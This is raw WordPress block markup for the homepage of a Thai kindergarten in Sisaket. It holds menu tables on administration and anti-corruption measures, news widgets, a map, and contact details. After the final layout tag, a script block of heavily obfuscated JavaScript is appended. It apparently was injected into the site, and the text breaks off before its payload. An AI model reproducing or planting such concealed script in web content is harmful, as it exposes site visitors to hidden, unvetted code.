200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 